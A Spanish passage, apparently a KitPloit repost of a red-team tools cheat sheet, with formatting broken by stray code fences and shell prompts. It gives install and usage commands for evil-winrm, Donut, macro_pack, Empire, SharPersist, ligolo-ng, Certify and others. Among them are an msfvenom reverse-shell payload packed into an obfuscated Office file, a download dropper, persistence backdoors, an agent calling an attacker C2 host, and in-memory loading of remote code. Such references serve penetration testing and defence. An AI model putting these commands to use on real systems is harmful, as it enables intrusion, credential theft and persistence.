secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

*Imagen usada de https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM es una herramienta que proporciona una interfaz de línea de comandos para Windows Remote Management (WinRM: *Un servicio que permite a los administradores ejecutar comandos de forma remota en una máquina Windows*).

Evil-WinRM permite a un atacante conectarse de forma remota a una máquina Windows usando WinRM y ejecutar comandos arbitrarios.

Algunas características incluyen:

- Cargar scripts de PowerShell en memoria
- Cargar archivos dll en memoria evadiendo algunos AVs
- Cargar payloads x64
- Soporte para Pass-the-hash
- Subir y descargar archivos locales y remotos

**Instalación: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Instalar: (gema de Ruby)```bash gem install evil-winrm

root@kitploit:~
Las instrucciones de instalación alternativa se pueden encontrar [aquí](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**Uso:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Puedes encontrar la documentación de uso completa aquí.

image

Imagen usada de https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

Una herramienta para la ejecución en memoria de archivos VBScript, JScript, EXE, DLL y ensamblados dotNET. Puede utilizarse para cargar y ejecutar cargas útiles personalizadas en sistemas objetivo sin necesidad de escribir archivos en el disco.

Instalación: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
Para generar la plantilla del cargador, la biblioteca dinámica donut.dll, la biblioteca estática donut.lib y el generador donut.exe. Inicie un Símbolo del sistema para desarrolladores de Microsoft Visual Studio x64, cambie al directorio donde clonó el repositorio de Donut e ingrese lo siguiente:```bash
nmake -f Makefile.msvc

Para hacer lo mismo, excepto usando MinGW-64 en Windows o Linux, cambie al directorio donde clonó el repositorio de Donut e ingrese lo siguiente:```bash make -f Makefile.mingw

root@kitploit:~
**Instalación: (Linux)**```bash
pip3 install donut-shellcode

Uso:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
Para obtener información completa sobre el uso, consulta la [Página de GitHub](https://github.com/TheWover/donut/#4-usage) de donut.

Consulta [una publicación reciente en el blog](https://thewover.github.io/Bear-Claw/) de The Wover para más información.

![image](https://assets.kitploit.com/production/public/readmes/147/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

Una herramienta utilizada para automatizar la ofuscación y generación de documentos de Office, scripts VB, accesos directos y otros formatos para red teaming.

**Instalación: (Binario)** 

1. Obtén el binario más reciente desde [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Descarga el binario en un PC con Microsoft Office genuino instalado.
3. Abre la consola, cambia al directorio del binario y ejecuta el binario.

**Instalación: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Uso:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

Una colección de scripts y módulos de PowerShell que se pueden utilizar para lograr diversos objetivos de red teaming.

Algunas de las características de PowerSploit:

- Volcar hashes de contraseñas y extraer contraseñas en texto claro de la memoria
- Escalar privilegios y eludir controles de seguridad
- Ejecutar código arbitrario de PowerShell y eludir restricciones de ejecución
- Realizar reconocimiento y descubrimiento de redes
- Generar cargas útiles y ejecutar exploits

**Instalación:** *1. Guardar en la carpeta de módulos de PowerShell*

Primero necesitarás descargar la [Carpeta de PowerSploit](https://github.com/PowerShellMafia/PowerSploit) y guardarla en tu carpeta de módulos de PowerShell.

La ruta de tu carpeta de módulos de PowerShell se puede encontrar con el siguiente comando:```
$Env:PSModulePath

Instalar: 2. Instalar PowerSploit como un módulo de PowerShell

A continuación, deberá instalar el módulo PowerSploit (use el nombre de la carpeta descargada).

Nota: Su política de ejecución de PowerShell podría bloquearlo, para solucionarlo ejecute el siguiente comando.``` powershell.exe -ep bypass

root@kitploit:~
Ahora puedes instalar el módulo PowerSploit.```
Import-Module PowerSploit

Uso:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Una herramienta que puede usarse para realizar varias acciones relacionadas con entornos de Microsoft Active Directory (AD), como volcar hashes de contraseñas, crear/eliminar usuarios y modificar propiedades de usuarios.

Algunas de las características de Rubeus:

- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks

**Instalación: (Descargar)** 

Puede instalar el binario no oficial precompilado de Rubeus [aquí](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe). 

**Instalación: (Compilar)** 

Rubeus es compatible con [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra el [proyecto .sln](https://github.com/GhostPack/Rubeus) de rubeus, elija "Release" y compile.

**Uso:**```
Rubeus.exe -h

image

🔙SharpUp

Una buena herramienta para verificar el endpoint de una víctima en busca de vulnerabilidades relacionadas con procesos de alta integridad, grupos, rutas secuestrables, etc.

Instalación: (Descarga)

Puede instalar el binario precompilado no oficial de SharpUp aquí.

Instalación: (Compilar)

SharpUp es compatible con Visual Studio 2015 Community Edition. Abra el archivo .sln del proyecto de SharpUp, seleccione "Release" y compile.

Uso:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) es un sistema de gestión de bases de datos relacional desarrollado y comercializado por Microsoft.

Este toolkit en C# para MS-SQL está diseñado para reconocimiento ofensivo y post-explotación. Para obtener información detallada sobre el uso de cada técnica, consulta la [wiki](https://github.com/skahwah/SQLRecon/wiki).

**Instalación: (Binario)**

Puedes descargar la última versión binaria desde [aquí](https://github.com/skahwah/SQLRecon/releases).

**Uso:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

La información completa de uso se puede encontrar en la wiki.

La información de uso de los módulos de la herramienta se puede encontrar aquí.

image

Imagen utilizada desde la página de ayuda de SQLRecon

🔙UltimateAppLockerByPassList

Este recurso es una colección de las técnicas más comunes y conocidas para evadir AppLocker.

Dado que AppLocker se puede configurar de diferentes maneras, @api0cradle mantiene una lista verificada de evasiones (que funcionan contra las reglas predeterminadas de AppLocker) y una lista con posibles técnicas de evasión (según la configuración) o que alguien afirma ser una evasión.

También tienen una lista de técnicas de evasión genéricas, así como una lista heredada de métodos para ejecutar a través de DLL.

Listas indexadas

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Imagen utilizada desde https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

Un lanzador basado en JavaScript y VBScript para Empire, que se ejecuta dentro de su propio host de PowerShell incrustado.

Ambos lanzadores se ejecutan dentro de su propio host de PowerShell incrustado, por lo que no necesitamos PowerShell.exe.

Esto puede ser útil cuando una empresa bloquea PowerShell.exe y/o utiliza una solución de listas blancas de aplicaciones, pero no bloquea la ejecución de archivos JS/VBS.

Uso:

  • Configurar un nuevo Listener dentro de PowerShell Empire
  • Usar el comando Launcher para generar un lanzador de PowerShell para ese listener
  • Copiar y reemplazar el Payload del lanzador codificado en Base64 dentro del archivo JavaScript o VBScript de StarFighter

Para la versión de JavaScript usa la siguiente Variable:```javascript var EncodedPayload = ""

root@kitploit:~
Para la versión de VBScript usa la siguiente Variable:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Luego ejecute: wscript.exe StarFighter.js o StarFighter.vbs en el destino, o haga doble clic en los lanzadores dentro del Explorador.

image

Imagen usada de https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

El objetivo de este proyecto es generar archivos .html que contienen un archivo HTA cifrado.

La idea es que cuando su objetivo visite la página, la clave se obtiene y el HTA se descifra dinámicamente dentro del navegador y se envía directamente al usuario.

Esta es una técnica de evasión para sortear la inspección de contenido/tipo de archivo implementada por algunos dispositivos de seguridad.

Más información técnica aquí.

Instalación:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**Uso:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Imagen usada de https://github.com/nccgroup/demiguise

🔙PowerZure

PowerZure es un proyecto de PowerShell creado para evaluar y explotar recursos dentro de la plataforma en la nube de Microsoft, Azure. PowerZure se creó por la necesidad de un framework que pueda realizar tanto reconocimiento como explotación de Azure, AzureAD y los recursos asociados.

No hay ninguna razón para ejecutar PowerZure en la máquina de la víctima. La autenticación se realiza mediante el uso de un archivo accesstoken.json existente o iniciando sesión a través del prompt al iniciar sesión en Azure, lo que significa que puedes usar PowerZure de manera segura para interactuar con la instancia en la nube de la víctima desde tu máquina de operación.

Instalación:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1

root@kitploit:~
**Uso:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget

Blog - Atacando Azure, Azure AD, y Presentando PowerZure

image

Imagen usada de https://hakin9.org

Persistencia

🔙Impacket

Impacket proporciona un conjunto de enlaces Python de bajo nivel para varios protocolos de red, incluyendo SMB, Kerberos y LDAP, así como bibliotecas de alto nivel para interactuar con servicios de red y realizar tareas específicas como el volcado de hashes de contraseñas y la creación de recursos compartidos de red.

También incluye varias herramientas de línea de comandos que pueden utilizarse para realizar diversas tareas como el volcado de bases de datos SAM, la enumeración de confianzas de dominio y el descifrado de contraseñas de Windows.

Instalación:```bash python3 -m pip install impacket

root@kitploit:~
**Instalación: (Con scripts de ejemplo)**

Descarga y extrae [el paquete](https://github.com/fortra/impacket), luego navega a la carpeta de instalación y ejecuta...```bash
python3 -m pip install .

Uso:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Genial [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) para el uso de Impacket.

![image](https://assets.kitploit.com/production/public/readmes/147/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire es un framework de post-explotación que permite generar payloads para establecer conexiones remotas con sistemas víctimas.

Una vez que un payload ha sido ejecutado en un sistema víctima, establece una conexión de vuelta al servidor Empire, que luego puede usarse para emitir comandos y controlar el sistema objetivo.

Empire también incluye una serie de módulos y scripts integrados que pueden usarse para realizar tareas específicas, como volcar hashes de contraseñas, acceder al registro de Windows y extraer datos.

**Instalación:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Uso:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
Nice hoja de referencia de uso de [HarmJoy](https://github.com/HarmJ0y) [aquí](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf).

![image](https://assets.kitploit.com/production/public/readmes/147/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

Un kit de herramientas de persistencia para Windows escrito en C#.

El proyecto tiene una [wiki](https://github.com/mandiant/SharPersist/wiki).

**Instalación: (Binario)** 

Puedes encontrar la versión más reciente [aquí](https://github.com/mandiant/SharPersist/releases).

**Instalación: (Compilar)** 

- Descarga los archivos del proyecto desde el [Repositorio de GitHub](https://github.com/mandiant/SharPersist).
- Abre el proyecto de Visual Studio y ve a "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- Ve a "NuGet Package Manager" --> "Package Sources"
- Añade un origen de paquetes con la URL "https://api.nuget.org/v3/index.json"
- Instala el paquete NuGet Costura.Fody. Se necesita la versión anterior de Costura.Fody (3.3.3) para que no necesites Visual Studio 2019.
	- `Install-Package Costura.Fody -Version 3.3.3`
- Instala el paquete TaskScheduler
	- `Install-Package TaskScheduler -Version 2.8.11`
- ¡Ahora puedes compilar el proyecto tú mismo!

**Uso:**

Una lista completa de ejemplos de uso se puede encontrar [aquí](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng es una herramienta simple, ligera y rápida que permite a los pentesters establecer túneles desde una conexión TCP/TLS inversa usando una interfaz tun (sin necesidad de SOCKS).

En lugar de usar un proxy SOCKS o reenviadores TCP/UDP, Ligolo-ng crea una pila de red en espacio de usuario usando Gvisor.

Al ejecutar el servidor relay/proxy, se utiliza una interfaz tun; los paquetes enviados a esta interfaz son traducidos y luego transmitidos a la red remota del agente.

Instalación: (Descarga)

Los binarios precompilados (Windows/Linux/macOS) están disponibles en la página de lanzamientos.

Instalación: (Compilar)

Para compilar ligolo-ng (se requiere Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**Configuración: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Configuración: (Windows)

Necesitas descargar el controlador Wintun (usado por WireGuard) y colocar el archivo wintun.dll en la misma carpeta que Ligolo (asegúrate de usar la arquitectura correcta).

Configuración: (Servidor proxy)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**Uso:**

*Inicie el agente en su computadora objetivo (víctima) (¡no se requieren privilegios!):*```bash
./agent -connect attacker_c2_server.com:11601

Una sesión debería aparecer en el servidor proxy.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
Usa el comando session para seleccionar el agente.```
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Full usage information can be found here.

image

Imagen utilizada de https://github.com/nicocha30/ligolo-ng#demo

Escalada de Privilegios

🔙Crassus

"Accenture creó una herramienta llamada Spartacus, que encuentra oportunidades de secuestro de DLL en Windows. Usando Spartacus como punto de partida, creamos Crassus para extender las capacidades de encontrar escalada de privilegios en Windows más allá de simplemente buscar archivos faltantes. Las ACL utilizadas por archivos y directorios de procesos privilegiados pueden encontrar más que solo buscar archivos faltantes para lograr el objetivo." - Enlace

Instalación: (Compilación)

Crassus fue desarrollado como un proyecto de Visual Studio 2019. Para compilar Crassus.exe:

  1. Abra Crassus.sln
  2. Presione Ctrl+Shift+B en su teclado

Instalación: (precompilado)

Si confía en ejecutar el código de otras personas sin saber lo que hace, Crassus.exe está proporcionado en este repositorio.

Uso:

  1. En Process Monitor, seleccione la opción Enable Boot Logging.
  2. Reinicie.
  3. Una vez que haya iniciado sesión y Windows se haya estabilizado, opcionalmente ejecute también las tareas programadas que pueden estar configuradas para ejecutarse con privilegios.
  4. Ejecute Process Monitor nuevamente.
  5. Cuando se le solicite, guarde el registro de arranque.
  6. Restablezca el filtro predeterminado de Process Monitor usando Ctrl-R.
  7. Guarde este archivo de registro, por ejemplo, en boot.PML. La razón para volver a guardar el archivo de registro es doble:
    1. Las versiones anteriores de Process Monitor no guardan los registros de arranque como un solo archivo.
    2. Los registros de arranque por defecto no estarán filtrados, lo que puede contener ruido adicional, como un secuestro de DLL de usuario local en el lanzamiento del propio Process Monitor.

Crassus

Imagen utilizada de https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots

🔙LinPEAS

LinPEAS es una herramienta de escalada de privilegios detallada y útil para encontrar rutas de escalada local en endpoints Linux.

Instalación + Uso:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS es una agradable y detallada herramienta de escalada de privilegios para encontrar rutas locales de privesc en endpoints Windows.

**Instalación + Uso:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration es otra buena herramienta de privesc para Linux, menos verbosa.

Instalación + Uso:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify es una herramienta en C# para enumerar y abusar de configuraciones incorrectas en Servicios de Certificado de Active Directory (AD CS).

Certify está diseñado para usarse junto con otras herramientas y técnicas de equipo rojo, como Mimikatz y PowerShell, para permitir a los miembros del equipo rojo realizar varios tipos de ataques, incluidos ataques de intermediario, ataques de suplantación y ataques de escalada de privilegios.

**Características clave de Certify:**
 
- Creación de certificados
- Firma de certificados
- Importación de certificados
- Modificación de la confianza de certificados

**Instalación: (Compilar)** 

Certify es compatible con [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra el proyecto Certify [.sln](https://github.com/GhostPack/Certify), elija "Release" y compile.

**Instalación: (Ejecutar Certify a través de PowerShell)** 

Si desea ejecutar Certify en memoria a través de un envoltorio de PowerShell, primero compile el Certify y codifique en base64 el assembly resultante:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify puede cargarse luego en un script de PowerShell con lo siguiente (donde "aa..." se reemplaza con la cadena de ensamblado de Certify codificada en base64):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
El método Main() y cualquier argumento pueden entonces invocarse de la siguiente manera:```
[Certify.Program]::Main("find /vulnerable".Split())

Las instrucciones completas de compilación se pueden encontrar here.

Uso:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://assets.kitploit.com/production/public/readmes/147/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword es un script de PowerShell que forma parte del kit PowerSploit, diseñado para recuperar contraseñas de cuentas locales que se crean y administran mediante Preferencias de Directiva de Grupo (GPP).

Get-GPPPassword funciona buscando en la carpeta SYSVOL del controlador de dominio cualquier archivo GPP que contenga información de contraseñas. Una vez que encuentra estos archivos, descifra la información de las contraseñas y la muestra al usuario.

**Instalación:** 

Siga las [instrucciones de instalación](https://github.com/A-poc/RedTeam-Tools#powersploit) de PowerSploit de esta hoja de herramientas.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

Uso:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

Script de PowerShell para encontrar rápidamente parches de software faltantes para vulnerabilidades de escalada de privilegios locales.

*Soporta:*

- MS10-015 : Modo de usuario al anillo (KiTrap0D)
- MS10-092 : Programador de tareas
- MS13-053 : Desbordamiento del pool del kernel Win32k en NTUserMessageCall
- MS13-081 : Página NULL de Win32k en TrackPopupMenuEx
- MS14-058 : Desreferencia de puntero nulo de Win32k en TrackPopupMenu
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Desbordamiento de búfer del controlador de fuentes
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Manejador de inicio de sesión secundario
- MS16-034 : Controladores en modo kernel de Windows EoP
- MS16-135 : Elevación de privilegios de Win32k
- CVE-2017-7199 : Escalada de privilegios en Nessus Agent 6.6.2 - 6.10.3

**Instalación: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Uso: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

*Imagen tomada de https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson es una herramienta .NET diseñada para enumerar KBs faltantes y sugerir exploits para vulnerabilidades de escalada de privilegios.

Excelente para identificar parches faltantes y sugerir exploits que podrían usarse para explotar vulnerabilidades conocidas con el fin de obtener privilegios más altos en el sistema.

**Instalación:**

Usando [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra el [proyecto Watson .sln](https://github.com/rasta-mouse/Watson), elija "Release" y compile.

**Uso:**```bash
# Run all checks
Watson.exe

image

Texto de imagen tomado de https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

Una herramienta basada en C# que automatiza el proceso de descubrir y explotar secuestros de DLL en binarios objetivo.

Las rutas secuestradas descubiertas pueden ser armadas, durante un compromiso, para evadir EDR.

Instalación:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • DLL de confirmación personalizados :
    • Estos son archivos DLL que ayudan a la herramienta a obtener la confirmación de si las DLL se han cargado exitosamente desde la ruta de secuestro identificada
    • Compilados desde el proyecto MalDLL proporcionado arriba (¡o usa los binarios precompilados si confías en mí!)
    • El nombre de la DLL de 32 bits debe ser: maldll32.dll
    • El nombre de la DLL de 64 bits debe ser: maldll64.dll
    • Instalar el paquete NuGet:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Requisito previo al compilar el proyecto ImpulsiveDLLHijack)

Nota: los requisitos i y ii deben colocarse en el propio directorio de ImpulsiveDLLHijacks.exe.

  • Información de compilación y configuración:

    • ImpulsiveDLLHijack

      • Clona el repositorio en Visual Studio
      • Una vez que el proyecto esté cargado en Visual Studio, ve a "Proyecto" --> "Administrar paquetes NuGet" --> Buscar paquetes e instalar "PeNet" -> https://www.nuget.org/packages/PeNet/
      • ¡Compila el proyecto!
      • El ImpulsiveDLLHijack.exe estará dentro del directorio bin.
    • Y para las DLL de confirmación:

      • Clona el repositorio en Visual Studio
      • Compila el proyecto con x86 y x64
      • Renombra la versión x86 como maldll32.dll y la versión x64 como maldll64.dll
    • Configuración: Copia las DLL de confirmación (maldll32 y maldll64) en el directorio de ImpulsiveDLLHijack.exe y luego ejecuta ImpulsiveDLLHijack.exe :))

Instrucciones de instalación de https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Uso:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
Ejemplos de uso se pueden encontrar [aquí](https://github.com/knight0x07/ImpulsiveDLLHijack#4-ejemplos).

![image](https://assets.kitploit.com/production/public/readmes/147/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

*Imagen usada de https://github.com/knight0x07/ImpulsiveDLLHijack#4-ejemplos*

### [🔙](#lista-de-herramientas)[ADFSDump](https://github.com/mandiant/ADFSDump)

Una herramienta en C# para volcar todo tipo de elementos útiles desde AD FS.

Creada por Doug Bienstock [@doughsec](https://twitter.com/doughsec) mientras trabajaba en Mandiant FireEye.

Esta herramienta está diseñada para ejecutarse junto con ADFSpoof. ADFSdump generará toda la información necesaria para crear tokens de seguridad usando ADFSpoof.

**Requisitos:**

- ADFSDump debe ejecutarse bajo el contexto de usuario de la cuenta de servicio de AD FS. Puede obtener esta información listando los procesos en el servidor de AD FS o desde la salida del cmdlet Get-ADFSProperties. Solo la cuenta de servicio de AD FS tiene los permisos necesarios para acceder a la base de datos de configuración. Ni siquiera un administrador del dominio (DA) puede acceder a ella.
- ADFSDump asume que el servicio está configurado para usar la Base de Datos Interna de Windows (WID). Aunque sería trivial admitir un servidor SQL externo, esta funcionalidad no existe actualmente.
- ADFSDump debe ejecutarse localmente en un servidor de AD FS, NO en un proxy de aplicación web de AD FS. La WID solo se puede acceder localmente a través de una tubería con nombre (named pipe).

**Instalación: (Compilar)**

ADFSDump fue compilado con .NET 4.5 usando Visual Studio 2017 Community Edition. Simplemente abra el archivo .sln del proyecto, seleccione "Release" y compile.

**Uso: (Banderas)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - Explorando el ataque Golden SAML contra ADFS

image

Imagen utilizada de https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

🔙BeRoot

BeRoot Project es una herramienta de post-explotación para verificar configuraciones incorrectas comunes y encontrar una manera de escalar nuestros privilegios.

El objetivo de BeRoot es solo mostrar oportunidades potenciales de escalada de privilegios y no una evaluación de configuración del endpoint.

Este proyecto funciona en Windows, Linux y Mac OS.

Instalación: (Linux)```bash git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/

root@kitploit:~
**Instalación: (Windows)** 

Una versión precompilada de BeRoot se puede encontrar [aquí](https://github.com/AlessandroZ/BeRoot/releases).

**Uso:**```bash
# Run BeRoot
python beroot.py
